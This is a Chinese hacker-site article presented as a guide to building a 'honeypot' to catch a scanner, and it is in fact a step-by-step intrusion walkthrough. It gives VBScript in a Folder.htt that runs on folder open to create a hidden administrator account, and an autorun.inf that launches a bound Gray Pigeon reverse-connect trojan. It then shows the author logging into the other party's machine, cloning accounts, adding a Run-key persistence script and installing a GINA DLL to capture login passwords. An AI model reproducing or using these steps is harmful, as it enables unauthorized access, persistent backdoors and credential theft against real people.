主页 PC知识 网管技术 黑客帝国 安全技术 开放系统 程序设计 搜索 技术论坛

 

相关联接
 
RHU本级分类

新手入门
入侵实例
工具使用
安全防范
黑客人物
软件破解
漏洞研究
 
RHU阅读排行
·阻止对Windows注册表的远程访问
·黑客俘获计算机的攻击方法和防御详解
·利用instr()函数防止SQL注入攻击
·对Serv-U 6.0.0.2默认帐户及密码的一点理解
·SQL Server提升权限相关命令及防范
·小规模DDoS用Freebsd+IPFW搞定
·两妙招“强行”杀死病毒进程
·SQL Server数据库安全规划全攻略
·用SSL加密增强FTP服务器安全性
·利用Catalyst交换机处理蠕虫病毒的入侵

 
 
RHU最新文章
·量子计算机时代加密算法McEliece被破解
·巧论ARP攻击防制方法之虚虚实实
·用Dos命令进行加锁 防病毒格式化硬盘
·Linux流量监控的三个方法
·ARP Sinffer用户攻防实例详解
·完整的XSS wrom入侵实现流程
·通过修改注册表来增强系统抵抗DDOS攻击
·黑客知识系列之防溢出提权攻击解决办法
·借助路由器防范恶意攻击WindowsNT漏洞
·使用路由器防御Dos攻击的新方法研究

 
 
RHU相关搜索









 
 
RHU广而告之

 
 
>您的位置:首页 -> 黑客帝国-> 安全防范
自己制作蜜罐捕捉入侵者

作者:RHU-TAC编辑员 来自:RHU-TAC编辑搜集 时间:2005-2-27 双击滚屏 收藏本页 字体:

点击 查看RHU2004全年文章


常在河边走,哪有不湿鞋,本人因为经常和一些黑友打交道,自然遭受过许多入侵,被扫描更是难免。前几天上网时,网速突然暴慢,我关了QQ和所有的网络应用软件后,右下角的网络连接图标还是闪个不停,莫非是被人扫描了?可是我没装防火墙(大家可不要学我),于是我想到了用嗅探器看看,一嗅果然嗅出了名堂,如图1。 
  看到了吧,从XXX.XXX.XXX.99机的4854端口发送数据包到我机(xxx.xxx.xxx.58)的1433端口,又返回去,这是典型被扫描的症状。我的机子更本没有SQL-SERVER哪来的1433端口?100%是被扫了,拿到IP后,先看看是有没有跟QQ上好友是一样的,看了一下没有,不管这些先用流光判断对方的系统, 
。对方是NT,那就好半了,先用x-scan扫一下。听了一首歌后发现没有弱口令,开了以下端口: 

端口21开放: FTP (Control)  

端口139开放: NETBIOS Session Service  

端口443开放: HttpS, Secure HTTP  

端口445开放: Microsoft-DS  

端口3389开放: Windows 2000 remote admin  

暴力破解21端口?太耗时间几率也小,139?NETBOIS?没口令一切都是空谈,3389?输入法?大海捞针。 
  于是我决定来此引狼入室,再来个瓮中捉鳖,其实蜜罐就是这道理。开工喽,首先先打开注册表,把空连接打开(注:把注册表里HKEY_LOCAL_MACHINE\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Lsarestrictanonymous REG_DWORD 0x2 改为0x0, 关闭所有共享,只把3个文件夹的共享打开,第一个文件夹里放置两个文件:Folder.htt,desktop.ini。 
如图2 
Folder.htt太长,这里省略,想看的请下载完整版。 

此文件可以在WINDOWS目录下找到,不过先要设置为“显示系统保护文件” 

用记事本打开,在一段代码与另一段代码之间插入以下代码, 
其中关键代码为: 
<script language=vbscript>  
    function muma() 
    dim wsh  
    set wsh=CreateObject(\\\\\\"WScript.Shell\\\\\\") 
    wsh.run \\\\\\"net.exe user aaa aa /add\\\\\\",0 
    wsh.run \\\\\\"net localgroup administrators aaa /add\\\\\\",0 
    wsh.run \\\\\\"net send 123.123.123.123 狼来拉\\\\\\",0 
    end function 
    </script> 
  <BODY onload=\\\\\\"vbscript :muma()\\\\\\"> 

desktop.ini的代码为: 
[ExtShellFolderViews] 
Default={5984FFE0-28D4-11CF-AE66-08002B2E1262} 
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262} 

[{5984FFE0-28D4-11CF-AE66-08002B2E1262}] 
PersistMoniker=file://Folder.htt 

[.ShellClassInfo] 
ConfirmFileOp=0 

制作方法很简单,就再现成的folder文件代码中添加以上代码就可以拉 
文件夹和Folder.htt的属性设置为,并把Folder.htt和desktop.ini隐藏,最后把文件夹选项改为允许文件夹中使用WEB,如图3,只读只要对方访问了第这个文件夹,就自动生成一个用户名为aaa密码aa,并向123.123.123.123发送狼来的短信。 
第2个文件夹也放两个文件:autorun.inf和flash.exe 
flash.exe是灰鸽子反弹木马,马中极品。 
autorun.inf代码如下: 
[AutoRun] 
OPEN= flash.exe /autorun 
只要对方访问了第这个文件夹,会自动运行flash.exe 
避免被发现已经和另一个flash动画合并了。 
步骤: 
1,启动BindFile,如图6 
2,添加要合并的软件,这里我们添加HGZ.EXE和FLASH 
(注:由于合并器默认只支持EXE文件,我们添加时再添加框内输入:*.*就会出现所有文件这事就可以添文件拉) 
为了保险起见我还把AUTORUN隐藏了,只要右键点击后进入属性里把隐藏打上勾,再点应用OK拉 
第3个文件夹只是放了几个无用的文件,做个幌子罢了。 
接下来就室设置权限了,在user组里创建一个名为shuangfeng的帐号,密码为空,创建的方法: 
进入计算机管理,在点本地用户和组,进入组然后双击USERS,入图4,点添加,对象名称里的方框里输入 
shuangfeng,点应用OK。 
把三个文件夹的共享都打开,进入安全把USER的权限中“读取和运行”“列出文件夹目录”“读取”打上勾,接着就是等他上钩了,如图5现在只等他进来了。 
  果然,几分钟后就收到了“狼来了拉”的短信,但没有灰鸽子的回应,看来是被杀了,树大招风啊。于是我马上登陆他的3389,用AAA帐号进去了,观察了一下,果然是肉鸡。先用CA克隆了guest,再删除AAA用户,方法如下: 
在CMD里输入ca \\\\\\\\\\\\\\\\123.123.123.123 aaa aa guest shuangfeng 
接着在肉鸡命令行输入:net user aaa /del 
再写个BAT,内容如下: 
time /t >>TSLog.log  
netstat -n -p tcp | find \\\\\\":3389\\\\\\">>TSLog.log  
start Explorer 
用记事本编辑以后存为3389.bat,放到d:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\里  
我来解释一下这个文件的含义:  

  第一行是记录用户登录的时间,time /t的意思是直接返回系统时间(如果不加/t,系统会等待你输入新的时间),然后我们用追加符号\\\\\\">>\\\\\\"把这个时间记入TSLog.log作为日志的时间字段;  

  第二行是记录用户的IP地址,netstat是用来显示当前网络连接状况的命令,-n表示显示IP和端口而不是域名、协议,-ptcp是只显示tcp协议,然后我们用管道符号\\\\\\"|\\\\\\"把这个命令的结果输出给find命令,从输出结果中查找包含\\\\\\":3389\\\\\\"的行(这就是我们要的客户的IP所在的行,如果你更改了终端服务的端口,这个数值也要作相应的更改),最后我们同样把这个结果重定向到日志文件TSLog.log中去,于是在SLog.log文件中,记录格式如下:  

  22:40  
  TCP  192.168.12.28:3389  192.168.10.123:4903   ESTABLISHED  
  22:54  
  TCP  192.168.12.28:3389   192.168.12.29:1039   ESTABLISHED  

  也就是说只要这个TSLog.bat文件一运行,所有连在3389端口上的IP都会被记录 
再写入HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\新建一个建值,内容为d:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\3389.bat 
最后下载一个牛族nt/2000/xp 密码大盗,在CMD下输入:gina-intall接着显示: 
======== Windows NT/2000/XP/.NET SERVER 2003 Password Dumper V1.0 =========== 
===== Powered By tiaozi, Welcome to our site http://www.niuzu.net/ ========= 

Usage: 
    Gina -install|-remove 

    -install     Install Gina Dll in order to get Logon user\\\\\\\’s Password 
    -remove     Remove Gina Dll and restore default Gina Dll 
Warning: This option need administrator Privilege of LocalMachine! 
      Please Don\\\\\\\’t use this program to hacker! Good Luck! :-) 


D:\\\\\\\\Documents and Settings\\\\\\\\aaa\\\\\\\\桌面>gina -install 

======== Windows NT/2000/XP/.NET SERVER 2003 Password Dumper V1.0 =========== 
===== Powered By tiaozi, Welcome to our site http://www.niuzu.net/ ========= 

Working now,Please Standby ... - 

STEP 1: 

  Source File: D:\\\\\\\\Documents and Settings\\\\\\\\maomao\\\\\\\\桌面\\\\\\\\SysGina32.dll 
  Target File: D:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\SysGina32.dll 
  Copy Gina Dll Option Success! 

STEP 2: 
  Gina Dll Was Set to Register Success... 

All Done, The password will be save to [D:\\\\\\\\winnt\\\\\\\\System32\\\\\\\\GinaPwd.txt] 
只要有人登陆后就会记录再D:\\\\\\\\winnt\\\\\\\\System32\\\\\\\\GinaPwd.txt里 
接着我重起了肉机。 
10分钟后我再次登陆了肉鸡,TClog.log上清清楚楚写这登陆着的IP,仔细一看,果然跟我的QQ中的一个人的IP一样,我在D:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\GinaPwd.txt得到他的密码后就撤了,因为我已经利用了这个简单的密罐完成了这次反入侵。如果我想的话可以用同样的方式在肉鸡上给那个人下个套,但我没这样,只留了个文本文件告诉了管理员就走了。剩下的事就事找那个人了。 

OVER
[1] 页 RedHyphone.Union 投稿邮箱
[特别声明]:
本站文章大多搜索转载自网络中,如果侵犯了您的权利,请告之我们。本站将立即删除。
本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
查看评论】【向上滚屏】【关闭窗口】【 打印
-相关文章
  • 提升权限终极技巧
  • 格式化字符串攻击笔记
  • 入侵win98系统(主机设有共享盘)的几个方法
  • 黑客破解口令常用的三种方法
  • 从一个简单破解中浅谈破解的思路
    • -文章评论 (关闭)
    ·还没有相关的评论!

    网上大名:
    红旋风网络技术联盟 RHUTech.Union
     
    Copyright © 2000-2007 RedHyphone.Union All Rights Reserved. 红旋风联盟版权所有.皖ICP备05011033号
    中国红旋风网络技术联盟 | www.RedHyphone.net
    Mailto:Redhyphone@gamil.com